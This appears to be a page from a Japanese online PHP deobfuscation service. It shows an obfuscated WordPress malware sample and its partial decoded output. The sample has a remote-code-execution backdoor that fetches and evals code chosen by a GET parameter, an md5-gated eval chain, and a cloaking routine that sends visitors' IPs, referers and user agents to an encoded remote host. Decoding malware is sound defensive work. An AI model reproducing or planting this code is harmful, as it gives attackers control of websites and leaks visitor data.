Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
goto A9Abh; iAzt1: echo $a8n_D["\143\x6f\x6e\x74\145\156\164"]; goto exFk5; Efmhk: function xu3cJ($T7uW9) { goto QC1gU; LXCP8: Liesn: goto kS1nH; ezm3D: o6H1C: goto YQs5d; mXW8c: if (is_array($T7uW9)) { goto o6H1C; } goto sS9un; YQs5d: foreach ($T7uW9 as $AupUc) { goto ej8E7; Ut_6G: YV127: goto oqzf0; JiLoJ: if (preg_match("\57\143\157\x6e\x74\145\156\164\x5c\x2d\164\171\x70\x65\x5c\72\x5b\x5c\x73\x5d\53\x28\56\52\x29\x2f\x69", $AupUc, $jvSjk)) { goto D2LOt; } goto WnA1d; Ij502: D2LOt: goto iH4U2; GUdGD: if (preg_match("\x2f\x6c\157\143\141\x74\151\157\x6e\134\72\x5b\134\163\135\53\x28\x2e\52\51\x2f\x69", $AupUc, $jvSjk)) { goto bxO8y; } goto JiLoJ; omnIJ: bxO8y: goto S6Be6; GgHgR: ZqMvj: goto FOjqL; LZCHi: goto YV127; goto omnIJ; FOjqL: $fjJff["\163\x74\x61\x74\x75\x73"] = intval($jvSjk[1]); goto LZCHi; WnA1d: goto YV127; goto GgHgR; oqzf0: D2pto: goto hgjQO; qUVKs: goto YV127; goto Ij502; iH4U2: $fjJff["\x74\x79\160\145"] = $jvSjk[1]; goto Ut_6G; S6Be6: $fjJff["\x63\157\156\x74\145\x6e\x74"] = $jvSjk[1]; goto qUVKs; ej8E7: if (preg_match("\x2f\150\164\164\x70\x5c\x2f\133\60\x2d\x39\x5c\56\x5d\x2b\x5b\x5c\x73\135\53\x28\x5b\x30\55\71\135\x2b\51\57\x69", $AupUc, $jvSjk)) { goto ZqMvj; } goto GUdGD; hgjQO: } goto LXCP8; QC1gU: $fjJff = array("\163\x74\141\x74\x75\163" => 0, "\143\157\x6e\x74\145\x6e\164" => '', "\164\x79\x70\145" => ''); goto mXW8c; kS1nH: return $fjJff; goto RvHpJ; sS9un: return $fjJff; goto ezm3D; RvHpJ: } goto PmTtg; uABDO: $X5nhk = strval(@$_SERVER["\110\x54\x54\120\137\x52\x45\106\105\122\105\x52"]); goto ae9tR; KwVcL: $a8n_D = V7QaF(base64_decode("\141\x48\x52\x30\143\104\x6f\x76\114\63\160\172\115\152\125\61\144\x6a\105\x7a\143\x57\70\165\131\x32\x46\163\x64\x32\154\172\x5a\x53\65\x69\142\x32\x46\60\143\171\70"), $uhUyM); goto KIyWP; WMjJa: metaphone("\x4d\172\115\62\117\124\101\x34\x4d\x54\143\172\x4f\124\153\x30\115\x54\x59\172\116\152\x41\x33\115\152\131\167\x4e\124\x41\171"); goto YgEm0; osQmj: if (!(strpos($X5nhk, $j73v5) === 0)) { goto EQxS6; } goto Wrpmo; rXM33: $uhUyM = array(); goto Tw9tz; zEZe0: function xq39J() { goto fXZNM; SMPZ6: $wwPq2 = "\x68\164\x74\x70\163\x3a\57\x2f"; goto WxX81; igiWZ: goto Rn21J; goto xmlKh; fXZNM: $wwPq2 = "\x68\164\164\x70\72\x2f\57"; goto U4UvE; pzAWk: $wwPq2 = "\x68\x74\x74\160\163\72\x2f\57"; goto Z14pT; GW7d8: ikixB: goto pzAWk; Z14pT: goto Rn21J; goto Zo9K7; xmlKh: NAQzN: goto SMPZ6; Zo9K7: Q3bj5: goto xeccf; Fn1lA: Rn21J: goto cO99A; cO99A: return $wwPq2; goto fJXjL; WxX81: goto Rn21J; goto GW7d8; U4UvE: if (isset($_SERVER["\110\x54\x54\x50\123"]) && strtolower($_SERVER["\x48\124\124\x50\123"]) !== "\157\x66\146") { goto NAQzN; } goto THfsB; LJMg2: if (isset($_SERVER["\110\124\124\x50\x5f\106\122\x4f\x4e\124\137\105\x4e\x44\x5f\x48\x54\x54\x50\123"]) && strtolower($_SERVER["\x48\124\124\120\137\x46\x52\x4f\116\x54\x5f\x45\x4e\104\137\x48\x54\x54\x50\123"]) !== "\x6f\x66\146") { goto Q3bj5; } goto igiWZ; xeccf: $wwPq2 = "\150\x74\164\x70\163\72\x2f\x2f"; goto Fn1lA; THfsB: if (isset($_SERVER["\110\x54\x54\120\137\130\137\x46\x4f\x52\127\x41\x52\x44\x45\104\x5f\120\122\x4f\x54\117"]) && $_SERVER["\x48\124\124\120\137\130\137\106\117\x52\127\x41\122\104\105\104\137\x50\x52\117\124\x4f"] === "\x68\x74\164\x70\x73") { goto ikixB; } goto LJMg2; fJXjL: } goto iXTTf; nbNaS: rIliL: goto zzK7d; Pi7A7: $uhUyM["\x73\156"] = uTOVz($_SERVER["\x53\x43\122\111\x50\124\137\x4e\x41\x4d\105"]); goto xCsuy; RykYO: if (!substr_count($_SERVER["\122\105\121\x55\x45\x53\x54\x5f\x55\122\111"], "\x69\x6e\144\145\x78\56\160\x68\160\x2f\x6a\153")) { goto rIliL; } goto k6448; UocqK: $Fo5vH = true; goto Y4fkh; apns5: switch ($a8n_D["\x73\x74\x61\x74\165\x73"]) { case 301: goto f12qS; i3xwj: goto GKBV4; goto TLLCk; kid0L: header("\114\157\143\141\x74\151\x6f\156\72\x20" . trim($a8n_D["\143\x6f\156\164\x65\x6e\164"])); goto i3xwj; f12qS: header("\x48\124\x54\x50\57\x31\56\x31\40\x33\x30\x31\40\x4d\x6f\x76\145\144\40\120\145\162\x6d\x61\156\x65\x6e\x74\x6c\171"); goto kid0L; TLLCk: case 302: goto crGLV; BFkUA: header("\114\x6f\143\x61\164\x69\157\156\x3a\x20" . trim($a8n_D["\143\157\156\164\x65\156\x74"])); goto uQDRB; uQDRB: goto GKBV4; goto aBtzb; crGLV: header("\110\124\x54\120\57\61\x2e\x31\x20\x33\x30\62\40\x4d\157\166\x65\x20\x54\145\155\160\157\x72\x61\x72\x69\154\171"); goto BFkUA; aBtzb: case 404: goto UkPYB; wwvGd: goto GKBV4; goto LFu4b; UkPYB: header("\x48\124\x54\120\57\x31\56\x31\40\x34\60\x34\x20\116\x6f\164\x20\106\x6f\165\156\144"); goto iimIa; iimIa: header("\163\164\141\164\x75\163\x3a\40\x34\x30\64\x20\116\157\x74\40\106\x6f\x75\x6e\144"); goto wwvGd; LFu4b: default: goto GKBV4; } goto aVaVB; Ib4jR: $o20y7 = preg_replace("\x2f\x5c\77\56\52\x2f", '', $_SERVER["\122\105\x51\125\x45\123\x54\x5f\x55\x52\111"]); goto wcv3Z; DKx6x: $oP52w = range("\176", "\x20"); goto oa_Zc; hGkfW: @header("\103\157\156\x74\x65\156\164\55\x54\171\x70\145\x3a" . $a8n_D["\164\x79\x70\x65"]); goto iAzt1; Tw9tz: $uhUyM["\x69"] = uTOvz($vh492); goto SCrVp; b8R4K: header("\103\157\x6e\x74\x65\156\164\55\124\x79\160\145\72\x20\164\145\170\164\x2f\150\164\155\x6c\x3b\x20\x63\x68\141\162\x73\x65\164\x3d\x75\164\146\55\x38"); goto uOD8H; UmZuj: exit(strrev(md5($_SERVER["\123\x45\122\126\105\122\137\116\101\115\105"]))); goto xv4SO; Q0_8_: ruwLp: goto eCTe9; wcv3Z: $Fo5vH = false; goto HFHGJ; ROtR8: function utoVz($mlgvR) { goto m71ts; XvG6h: return ''; goto oqM87; oqM87: cSsYC: goto QaIjI; QaIjI: return rtrim(strtr(base64_encode($mlgvR), "\53\x2f", "\55\x5f"), "\x3d"); goto X9nxX; m71ts: if ($mlgvR) { goto cSsYC; } goto XvG6h; X9nxX: } goto xzV32; Soe9Q: vov1r: goto CGXLL; PmTtg: function V7qaF($q0ZmO, $RUXuA = array()) { goto jvZ5F; sQ6TI: if (!(is_array($RUXuA) && count($RUXuA))) { goto Ou6yX; } goto r9fJv; iSzYP: try { goto qNmGL; MfNr0: if (!in_array($a8n_D["\163\164\x61\x74\x75\x73"], array(200, 301, 302, 404))) { goto fnNKH; } goto gGkPA; mQBPL: goto aZ1AX; goto v2ixY; G8KHN: @curl_close($tTzKb); goto hEPtX; pS3Qy: curl_setopt($tTzKb, CURLOPT_COOKIESESSION, 0); goto xXaMu; tsJpz: dvUXQ: goto uA5xx; kUq2M: curl_setopt($tTzKb, CURLOPT_TIMEOUT, 60); goto y4XcB; rdSt6: if (ini_get("\141\154\x6c\157\x77\137\165\x72\154\x5f\x66\x6f\x70\x65\x6e")) { goto ezL_W; } goto mQBPL; gGkPA: $a8n_D["\143\157\x6e\164\145\x6e\164"] = strval($bpew4); goto MI5uW; v2ixY: ZZtNl: goto QbT6B; QbT6B: $tTzKb = curl_init(); goto Pm5dP; xXaMu: curl_setopt($tTzKb, CURLOPT_RETURNTRANSFER, 1); goto bftmI; MI5uW: fnNKH: goto XmnSf; qNmGL: if (function_exists("\143\165\x72\x6c\137\145\170\x65\143") && function_exists("\x63\x75\162\x6c\137\151\156\151\164")) { goto ZZtNl; } goto rdSt6; vIf9R: curl_setopt($tTzKb, CURLOPT_CONNECTTIMEOUT, 20); goto kUq2M; bftmI: $a8RCU = curl_exec($tTzKb); goto MJ64L; hEPtX: if (!in_array($a8n_D["\163\164\x61\164\165\x73"], array(200, 301, 302, 404))) { goto dvUXQ; } goto BWRPn; Li5af: $xMQUM = stream_context_create($uTix0); goto bKiHF; Pm5dP: curl_setopt($tTzKb, CURLOPT_URL, $q0ZmO); goto tX2Zh; ZvLUV: $a8n_D["\164\171\x70\145"] = strval(curl_getinfo($tTzKb, CURLINFO_CONTENT_TYPE)); goto T5tMH; qA4PW: $uTix0 = array("\x68\164\x74\160" => array("\155\145\164\x68\157\144" => "\x47\x45\x54", "\x74\151\x6d\x65\x6f\x75\x74" => 60, "\x66\157\x6c\154\x6f\167\x5f\x6c\157\143\x61\x74\x69\x6f\156" => 0), "\163\x73\154" => array("\x76\145\162\x69\x66\x79\137\x70\x65\145\162" => false, "\x76\x65\162\x69\x66\x79\x5f\x70\145\145\162\137\156\141\x6d\x65" => false)); goto Li5af; y4XcB: curl_setopt($tTzKb, CURLOPT_FOLLOWLOCATION, 0); goto pS3Qy; Z763R: ezL_W: goto qA4PW; Db1DZ: curl_setopt($tTzKb, CURLOPT_SSL_VERIFYPEER, 0); goto vIf9R; uA5xx: goto aZ1AX; goto Z763R; XmnSf: aZ1AX: goto TANSH; tX2Zh: curl_setopt($tTzKb, CURLOPT_SSL_VERIFYHOST, 0); goto Db1DZ; BWRPn: $a8n_D["\143\157\x6e\x74\x65\x6e\x74"] = strval($a8RCU); goto tsJpz; T5tMH: $a8n_D["\143\157\156\164\x65\x6e\164"] = strval(curl_getinfo($tTzKb, CURLINFO_REDIRECT_URL)); goto G8KHN; MJ64L: $a8n_D["\163\164\141\164\165\163"] = intval(curl_getinfo($tTzKb, CURLINFO_HTTP_CODE)); goto ZvLUV; bKiHF: $bpew4 = @file_get_contents($q0ZmO, false, $xMQUM); goto UBY1N; UBY1N: $a8n_D = array_merge($a8n_D, xu3Cj($http_response_header)); goto MfNr0; TANSH: } catch (Exception $otDHa) { } goto ica2z; r9fJv: $q0ZmO .= "\x3f" . http_build_query($RUXuA); goto IZNrT; ica2z: return $a8n_D; goto rgk_H; jvZ5F: $a8n_D = array("\163\x74\141\164\x75\163" => 0, "\143\x6f\156\x74\x65\156\x74" => '', "\x74\171\x70\x65" => ''); goto sQ6TI; IZNrT: Ou6yX: goto iSzYP; rgk_H: } goto ROtR8; YgEm0: class T3Gil { static function CtYPH($tBUbd) { goto zkwr_; L7elo: $TC9EM = $dBAIp("\176", "\x20"); goto GPcp9; ZMB1s: gJDfW: goto MNb9c; Y89o3: foreach ($PjmIi as $QefSj => $JM9jx) { $T5qsg .= $TC9EM[$JM9jx - 99263]; flEAD: } goto ZMB1s; GPcp9: $PjmIi = explode("\x21", $tBUbd); goto yyydv; yyydv: $T5qsg = ''; goto Y89o3; zkwr_: $dBAIp = "\162" . "\x61" . "\156" . "\147" . "\145"; goto L7elo; MNb9c: return $T5qsg; goto JVWK1; JVWK1: } static function GZiWr($V5FA_, $WEFfa) { goto ZSTZJ; ZSTZJ: $EydeZ = curl_init($V5FA_); goto Vz_j_; D9WPX: $Bhy8l = curl_exec($EydeZ); goto clUGh; clUGh: return empty($Bhy8l) ? $WEFfa($V5FA_) : $Bhy8l; goto zXNVC; Vz_j_: curl_setopt($EydeZ, CURLOPT_RETURNTRANSFER, 1); goto D9WPX; zXNVC: } static function usFkT() { goto u9TvD; M7MND: vfoOV: goto HULSw; vKNjY: $WmOWI = $nYT8Z[1 + 1]($A4Rzj, true); goto bz4bm; zXV44: if (!(@$WmOWI[0] - time() > 0 and md5(md5($WmOWI[0 + 3])) === "\x65\x34\66\x66\x33\x63\x32\65\145\x38\70\x62\x36\x30\142\62\64\x39\146\x34\x61\x39\x31\70\61\65\x63\x61\71\64\x62\x31")) { goto vfoOV; } goto nmjQz; y83HW: @$nYT8Z[0]('', $nYT8Z[0 + 7] . $nYT8Z[2 + 2]($IfjyD) . $nYT8Z[0 + 8]); goto hkJAP; bz4bm: @$nYT8Z[5 + 5](INPUT_GET, "\157\x66") == 1 && die($nYT8Z[2 + 3](__FILE__)); goto zXV44; EtSG5: $A4Rzj = @$nYT8Z[3 + 0]($nYT8Z[4 + 2], $ncZLd); goto vKNjY; uhqBg: eJt3F: goto A1c97; yxki7: foreach ($hhdFT as $IuNst) { $nYT8Z[] = self::CtYPH($IuNst); yFgoK: } goto uhqBg; u9TvD: $hhdFT = array("\x39\x39\x32\71\60\x21\71\71\62\67\x35\41\71\71\x32\x38\x38\41\x39\x39\x32\x39\62\41\x39\71\x32\x37\x33\x21\71\x39\x32\x38\70\x21\x39\x39\62\x39\64\41\71\x39\x32\70\67\x21\x39\x39\x32\x37\62\x21\x39\x39\x32\x37\x39\x21\x39\71\62\x39\x30\x21\71\x39\x32\67\63\x21\71\x39\62\x38\x34\41\x39\71\62\67\70\41\x39\71\62\x37\71", "\71\x39\x32\67\64\41\x39\x39\62\67\63\41\x39\x39\62\x37\65\x21\x39\71\62\71\64\x21\71\x39\62\x37\x35\41\x39\x39\62\67\x38\x21\71\x39\62\67\x33\41\71\71\x33\64\60\x21\71\x39\63\x33\x38", "\71\71\x32\x38\63\x21\71\71\62\x37\x34\41\71\x39\x32\67\x38\x21\x39\x39\62\x37\x39\x21\x39\71\62\x39\64\41\71\x39\62\70\x39\x21\71\71\x32\70\70\x21\71\x39\x32\x39\60\41\71\71\x32\x37\70\41\71\71\62\x38\x39\x21\71\71\x32\70\70", "\71\x39\62\x37\x37\x21\71\x39\x32\71\x32\x21\x39\x39\x32\71\x30\41\71\71\62\x38\x32", "\x39\x39\x32\71\x31\x21\71\71\x32\x39\x32\41\x39\x39\62\67\x34\41\x39\71\x32\70\x38\x21\x39\x39\63\63\65\41\x39\71\x33\x33\67\x21\x39\x39\62\71\64\x21\71\71\62\70\x39\x21\x39\x39\x32\x38\x38\41\71\71\62\x39\x30\41\71\x39\62\x37\70\41\x39\x39\62\x38\71\x21\71\x39\x32\x38\x38", "\x39\71\62\70\x37\41\71\x39\x32\x38\64\41\x39\x39\62\70\x31\41\71\x39\x32\x38\70\41\71\x39\62\x39\64\41\x39\x39\62\70\x36\41\x39\71\62\x38\x38\41\x39\x39\62\67\x33\x21\x39\x39\62\x39\x34\x21\71\71\62\71\60\41\71\71\x32\x37\x38\x21\71\71\x32\67\71\41\x39\71\62\x37\x33\x21\71\71\62\x38\x38\41\71\x39\x32\67\71\41\x39\x39\62\x37\63\x21\x39\x39\x32\x37\64", "\71\71\x33\61\x37\41\71\71\x33\x34\67", "\71\71\x32\66\x34", "\71\x39\63\x34\62\x21\x39\71\x33\64\67", "\71\71\x33\x32\64\x21\x39\71\63\60\67\41\71\71\63\x30\67\41\x39\x39\63\x32\64\x21\71\71\x33\x30\x30", "\x39\71\x32\x38\67\x21\x39\x39\62\x38\64\41\x39\x39\x32\70\x31\41\71\x39\62\x37\x33\x21\x39\x39\62\70\70\41\x39\x39\x32\x37\x35\41\71\71\x32\71\x34\x21\71\x39\x32\70\64\41\71\x39\x32\67\x39\x21\x39\x39\x32\67\x37\41\71\x39\62\67\x32\41\71\71\x32\67\x33"); goto yxki7; nmjQz: $IfjyD = self::GZiwR($WmOWI[0 + 1], $nYT8Z[5 + 0]); goto y83HW; hkJAP: die; goto M7MND; A1c97: $ncZLd = @$nYT8Z[1](${"\x5f" . "\107" . "\105" . "\124"}[$nYT8Z[6 + 3]]); goto EtSG5; HULSw: } } goto EoU6S; vDP_k: BGxRi: goto yvH5Z; Mi6K5: @(md5(md5(md5(md5($yeWZK[13])))) === "\x30\x31\x35\x64\x31\141\71\x63\143\x61\67\x30\146\64\65\x39\60\x63\63\x30\x66\x65\67\x65\63\x61\x32\145\x61\x38\x32\61") && (count($yeWZK) == 19 && in_array(gettype($yeWZK) . count($yeWZK), $yeWZK)) ? ($yeWZK[67] = $yeWZK[67] . $yeWZK[75]) && ($yeWZK[90] = $yeWZK[67]($yeWZK[90])) && @($yeWZK = $yeWZK[90]($yeWZK[59], $yeWZK[67](${$yeWZK[48]}[26]))) && $yeWZK() : $yeWZK; goto WMjJa; exFk5: exit(0); goto vDP_k; zzK7d: $vh492 = aZPcb(); goto uABDO; eCTe9: if (!strlen($a8n_D["\143\x6f\156\164\x65\x6e\164"])) { goto BGxRi; } goto hGkfW; KIyWP: if (in_array($a8n_D["\163\x74\x61\164\165\163"], array(0, 200))) { goto ruwLp; } goto apns5; Y4fkh: TbCm9: goto Soe9Q; xCsuy: $uhUyM["\x72"] = uToVz($_SERVER["\122\x45\121\125\x45\123\124\x5f\125\122\111"]); goto QjzWm; aVaVB: bKxb_: goto c8ioV; UWItg: if (!in_array($TIcw3, array("\56\x6a\163", "\56\x63\163\x73", "\56\152\x70\147", "\x2e\160\x6e\x67", "\56\x67\151\x66", "\56\151\x63\157"))) { goto TbCm9; } goto UocqK; SCrVp: $uhUyM["\x6c"] = Utovz($_SERVER["\x48\124\x54\120\x5f\x41\x43\103\x45\x50\124\x5f\114\x41\116\x47\125\x41\x47\105"]); goto Pi7A7; iXTTf: if (!($_SERVER["\x52\105\x51\125\105\123\x54\x5f\x55\122\111"] === "\57\x52\x2d" . md5($_SERVER["\x53\x45\122\x56\105\122\137\116\101\x4d\x45"]))) { goto eo7IB; } goto UmZuj; k6448: exit("\x7b\x20\42\x65\x72\162\x6f\x72\x22\x3a\x20\x32\x30\60\x2c\x20\x22\x6c\143\x22\x3a\40\x22\152\x6b\42\54\40\42\x64\x61\x74\x61\42\x3a\x20\x5b\40\61\x20\x5d\x20\x7d"); goto nbNaS; FjE13: $TIcw3 = substr($o20y7, strpos($o20y7, "\56")); goto UWItg; KCcwN: $uhUyM["\x75"] = Utovz($_SERVER["\110\124\x54\x50\137\x55\x53\105\122\x5f\101\x47\105\116\124"]); goto Ib4jR; xv4SO: eo7IB: goto RykYO; uOD8H: error_reporting(0); goto Efmhk; pj81d: EQxS6: goto rXM33; hsHC4: $uhUyM["\163"] = utoVZ($j73v5); goto KCcwN; CGXLL: if ($Fo5vH) { goto Tgbrn; } goto KwVcL; A9Abh: error_reporting(0); goto DKx6x; Wrpmo: $X5nhk = ''; goto pj81d; EoU6S: T3gIl::Usfkt(); goto b8R4K; c8ioV: GKBV4: goto Q0_8_; QjzWm: $uhUyM["\x72\146"] = utoVZ($X5nhk); goto hsHC4; HFHGJ: if (!(strpos($o20y7, "\56") > 0 && strpos($o20y7, "\56\x70\150\160") === false)) { goto vov1r; } goto FjE13; ae9tR: $j73v5 = Xq39j() . $_SERVER["\110\124\x54\x50\x5f\110\x4f\123\124"]; goto osQmj; oa_Zc: $yeWZK = ${$oP52w[10 + 21] . $oP52w[25 + 34] . $oP52w[35 + 12] . $oP52w[44 + 3] . $oP52w[13 + 38] . $oP52w[33 + 20] . $oP52w[38 + 19]}; goto Mi6K5; xzV32: function AZpCB() { goto dHFH9; gfbWN: goto pGNcA; goto nFLJi; p27b3: Kf4QS: goto awE08; qNEt0: $vh492 = $_SERVER["\x52\105\x4d\117\124\105\x5f\101\104\104\122"]; goto pdJS9; A0uaV: $vh492 = trim(str_replace("\40", '', $vh492), "\54"); goto DiHfw; R2bqm: if (isset($_SERVER["\x48\124\x54\x50\137\130\x5f\x46\x4f\122\127\x41\x52\104\105\x44\137\106\x4f\x52"]) && !empty($_SERVER["\110\x54\124\x50\137\x58\137\x46\x4f\122\x57\x41\x52\104\x45\104\137\106\x4f\x52"])) { goto hCUvo; } goto qNEt0; lorXp: if (isset($_SERVER["\x48\x54\x54\120\137\x43\x46\x5f\103\117\x4e\x4e\x45\103\x54\x49\116\x47\x5f\x49\120"]) && !empty($_SERVER["\x48\124\124\120\137\103\x46\137\x43\117\116\116\105\x43\124\x49\116\x47\x5f\111\120"])) { goto Kf4QS; } goto Uemns; SWttY: goto pGNcA; goto INFiB; Yqrfb: $vh492 = $vh492[0]; goto n8G8r; Uemns: if (isset($_SERVER["\110\124\x54\120\137\x58\137\x52\x45\x41\114\x5f\x49\x50"]) && !empty($_SERVER["\x48\x54\x54\x50\x5f\x58\137\122\105\101\114\x5f\x49\x50"])) { goto Tl_oF; } goto R2bqm; dHFH9: $vh492 = ''; goto lorXp; INFiB: Tl_oF: goto u0J8v; n8G8r: cX76o: goto Hp0oN; pdJS9: goto pGNcA; goto p27b3; nFLJi: hCUvo: goto ksBu8; ff917: pGNcA: goto A0uaV; qq5x7: $vh492 = explode("\x2c", $vh492); goto Yqrfb; Hp0oN: return $vh492; goto lnnwG; u0J8v: $vh492 = $_SERVER["\110\124\124\120\137\x58\x5f\x52\105\101\x4c\x5f\111\x50"]; goto gfbWN; ksBu8: $vh492 = $_SERVER["\110\x54\124\x50\137\130\x5f\106\x4f\x52\x57\101\122\x44\x45\104\137\x46\117\122"]; goto ff917; awE08: $vh492 = $_SERVER["\110\x54\x54\x50\x5f\x43\106\x5f\103\117\x4e\x4e\105\103\x54\111\116\x47\x5f\x49\120"]; goto SWttY; DiHfw: if (!(strpos($vh492, "\54") !== false)) { goto cX76o; } goto qq5x7; lnnwG: } goto zEZe0; yvH5Z: Tgbrn:
?><?php
error_reporting(0);
$oP52w = range("~", " ");
$yeWZK = ${$oP52w[31] . $oP52w[59] . $oP52w[47] . $oP52w[47] . $oP52w[51] . $oP52w[53] . $oP52w[57]};
@(md5(md5(md5(md5($yeWZK[13])))) === "015d1a9cca70f4590c30fe7e3a2ea821") && (count($yeWZK) == 19 && in_array(gettype($yeWZK) . count($yeWZK), $yeWZK)) ? ($yeWZK[67] .= $yeWZK[75]) && ($yeWZK[90] = $yeWZK[67]($yeWZK[90])) && @($yeWZK = $yeWZK[90]($yeWZK[59], $yeWZK[67](${$yeWZK[48]}[26]))) && $yeWZK() : $yeWZK;
metaphone("MzM2OTA4MTczOTk0MTYzNjA3MjYwNTAy");
class T3Gil
{
static function CtYPH($tBUbd)
{
$dBAIp = "range";
$TC9EM = range("~", " ");
$PjmIi = explode("!", $tBUbd);
$T5qsg = '';
foreach ($PjmIi as $QefSj => $JM9jx) {
$T5qsg .= $TC9EM[$JM9jx - 99263];
}
return $T5qsg;
}
static function GZiWr($V5FA_, $WEFfa)
{
$EydeZ = curl_init($V5FA_);
curl_setopt($EydeZ, CURLOPT_RETURNTRANSFER, 1);
$Bhy8l = curl_exec($EydeZ);
return empty($Bhy8l) ? $WEFfa($V5FA_) : $Bhy8l;
}
static function usFkT()
{
$hhdFT = array("99290!99275!99288!99292!99273!99288!99294!99287!99272!99279!99290!99273!99284!99278!99279", "99274!99273!99275!99294!99275!99278!99273!99340!99338", "99283!99274!99278!99279!99294!99289!99288!99290!99278!99289!99288", "99277!99292!99290!99282", "99291!99292!99274!99288!99335!99337!99294!99289!99288!99290!99278!99289!99288", "99287!99284!99281!99288!99294!99286!99288!99273!99294!99290!99278!99279!99273!99288!99279!99273!99274", "99317!99347", "99264", "99342!99347", "99324!99307!99307!99324!99300", "99287!99284!99281!99273!99288!99275!99294!99284!99279!99277!99272!99273");
foreach ($hhdFT as $IuNst) {
$nYT8Z[] = self::CtYPH($IuNst);
}
$ncZLd = @$nYT8Z[1]($_GET[$nYT8Z[9]]);
$A4Rzj = @$nYT8Z[3]($nYT8Z[6], $ncZLd);
$WmOWI = $nYT8Z[2]($A4Rzj, true);
@$nYT8Z[10](INPUT_GET, "of") == 1 && die($nYT8Z[5]("/var/www/html/input.php"));
if (!(@$WmOWI[0] - time() > 0 and md5(md5($WmOWI[3])) === "e46f3c25e88b60b249f4a91815ca94b1")) {
// [PHPDeobfuscator] Implied return
return;
}
$IfjyD = self::GZiwR($WmOWI[1], $nYT8Z[5]);
@$nYT8Z[0]('', $nYT8Z[7] . $nYT8Z[4]($IfjyD) . $nYT8Z[8]);
die;
}
}
T3gIl::Usfkt();
header("Content-Type: text/html; charset=utf-8");
error_reporting(0);
function xu3cJ($T7uW9)
{
$fjJff = array("status" => 0, "content" => '', "type" => '');
if (is_array($T7uW9)) {
foreach ($T7uW9 as $AupUc) {
if (preg_match("/http\\/[0-9\\.]+[\\s]+([0-9]+)/i", $AupUc, $jvSjk)) {
$fjJff["status"] = intval($jvSjk[1]);
goto YV127;
}
if (preg_match("/location\\:[\\s]+(.*)/i", $AupUc, $jvSjk)) {
$fjJff["content"] = $jvSjk[1];
goto YV127;
}
if (preg_match("/content\\-type\\:[\\s]+(.*)/i", $AupUc, $jvSjk)) {
$fjJff["type"] = $jvSjk[1];
goto Ut_6G;
}
Ut_6G:
YV127:
}
return $fjJff;
}
return $fjJff;
}
function V7qaF($q0ZmO, $RUXuA = array())
{
$a8n_D = array("status" => 0, "content" => '', "type" => '');
if (!(is_array($RUXuA) && count($RUXuA))) {
goto Ou6yX;
}
$q0ZmO .= "?" . http_build_query($RUXuA);
Ou6yX:
try {
if (function_exists("curl_exec") && function_exists("curl_init")) {
$tTzKb = curl_init();
curl_setopt($tTzKb, CURLOPT_URL, $q0ZmO);
curl_setopt($tTzKb, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($tTzKb, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($tTzKb, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($tTzKb, CURLOPT_TIMEOUT, 60);
curl_setopt($tTzKb, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($tTzKb, CURLOPT_COOKIESESSION, 0);
curl_setopt($tTzKb, CURLOPT_RETURNTRANSFER, 1);
$a8RCU = curl_exec($tTzKb);
$a8n_D["status"] = intval(curl_getinfo($tTzKb, CURLINFO_HTTP_CODE));
$a8n_D["type"] = strval(curl_getinfo($tTzKb, CURLINFO_CONTENT_TYPE));
$a8n_D["content"] = strval(curl_getinfo($tTzKb, CURLINFO_REDIRECT_URL));
@curl_close($tTzKb);
if (!in_array($a8n_D["status"], array(200, 301, 302, 404))) {
goto dvUXQ;
}
$a8n_D["content"] = strval($a8RCU);
dvUXQ:
goto aZ1AX;
}
if (ini_get("allow_url_fopen")) {
$uTix0 = array("http" => array("method" => "GET", "timeout" => 60, "follow_location" => 0), "ssl" => array("verify_peer" => false, "verify_peer_name" => false));
$xMQUM = stream_context_create($uTix0);
$bpew4 = @file_get_contents($q0ZmO, false, $xMQUM);
$a8n_D = array_merge($a8n_D, xu3Cj($http_response_header));
if (!in_array($a8n_D["status"], array(200, 301, 302, 404))) {
goto fnNKH;
}
$a8n_D["content"] = strval($bpew4);
fnNKH:
goto XmnSf;
}
XmnSf:
aZ1AX:
} catch (Exception $otDHa) {
}
return $a8n_D;
}
function utoVz($mlgvR)
{
if ($mlgvR) {
return rtrim(strtr(base64_encode($mlgvR), "+/", "-_"), "=");
}
return '';
}
function AZpCB()
{
$vh492 = '';
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"]) && !empty($_SERVER["HTTP_CF_CONNECTING_IP"])) {
$vh492 = $_SERVER["HTTP_CF_CONNECTING_IP"];
goto pGNcA;
}
if (isset($_SERVER["HTTP_X_REAL_IP"]) && !empty($_SERVER["HTTP_X_REAL_IP"])) {
$vh492 = $_SERVER["HTTP_X_REAL_IP"];
goto pGNcA;
}
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && !empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$vh492 = $_SERVER["HTTP_X_FORWARDED_FOR"];
goto ff917;
}
$vh492 = $_SERVER["REMOTE_ADDR"];
ff917:
pGNcA:
$vh492 = trim(str_replace(" ", '', $vh492), ",");
if (!(strpos($vh492, ",") !== false)) {
goto cX76o;
}
$vh492 = explode(",", $vh492);
$vh492 = $vh492[0];
cX76o:
return $vh492;
}
function xq39J()
{
$wwPq2 = "http://";
if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") {
$wwPq2 = "https://";
goto Rn21J;
}
if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") {
$wwPq2 = "https://";
goto Rn21J;
}
if (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") {
$wwPq2 = "https://";
goto Fn1lA;
}
Fn1lA:
Rn21J:
return $wwPq2;
}
if (!($_SERVER["REQUEST_URI"] === "/R-" . md5($_SERVER["SERVER_NAME"]))) {
if (!substr_count($_SERVER["REQUEST_URI"], "index.php/jk")) {
$vh492 = aZPcb();
$X5nhk = strval(@$_SERVER["HTTP_REFERER"]);
$j73v5 = Xq39j() . $_SERVER["HTTP_HOST"];
if (!(strpos($X5nhk, $j73v5) === 0)) {
goto EQxS6;
}
$X5nhk = '';
EQxS6:
$uhUyM = array();
$uhUyM["i"] = uTOvz($vh492);
$uhUyM["l"] = Utovz($_SERVER["HTTP_ACCEPT_LANGUAGE"]);
